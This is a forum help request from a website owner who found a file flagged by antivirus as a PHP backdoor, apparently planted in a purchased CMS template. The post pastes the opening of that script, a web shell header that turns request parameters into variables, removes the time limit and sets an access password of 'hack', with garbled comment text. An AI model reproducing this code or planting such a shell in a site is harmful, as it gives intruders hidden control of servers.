I have recently purchased a template for a cms system online and asked the developers to install it for me, it wasnt a cheap template either so im a bit suprised that when i was doing a back up of my files (through filezilla to my PC), my AVG antivirus prompted a detection for a trojan horse PHP/BackDoor.AG file as a threat and this file is originating from tmp/css.php within the files which have been uploaded to my server.
The script looks like this:
error_reporting(7);
@set_magic_quotes_runtime(0);ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
define('IS_GPC', get_magic_quotes_gpc()); $dis_func = get_cfg_var('disable_functions'); define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
@set_time_limit(0);
foreach(array('_GET','_POST') as $_request) {
foreach($$_request as $_key => $_value) {
if ($_key{0} != '_') {
if (IS_GPC) {
$_value = s_array($_value);
} $$_key = $_value;
}}}/*===================== ³Ìà òÅäÖà =====================*/
$admin = array();
// ÊÇ·ñà èÒªÃÜÂëÑéÖ¤, true �ªà èÒªÑéÖ¤, false �ªÖ±½Ó½øÈë.à ÂÃæÑ¡à îÔò��à § $admin['check'] = false;
// Èç¹ûà èÒªÃÜÂëÑéÖ¤,Çëà �¸ÄµÇ½ÃÜÂë $admin['pass'] = 'hack';
I have no idea what this means, there is more code, if any body wants to take a look i can post a link to the whole thing. I just need to know wether or not to delete it from my web host.
Any help with this, i will forever greatful!! thanks
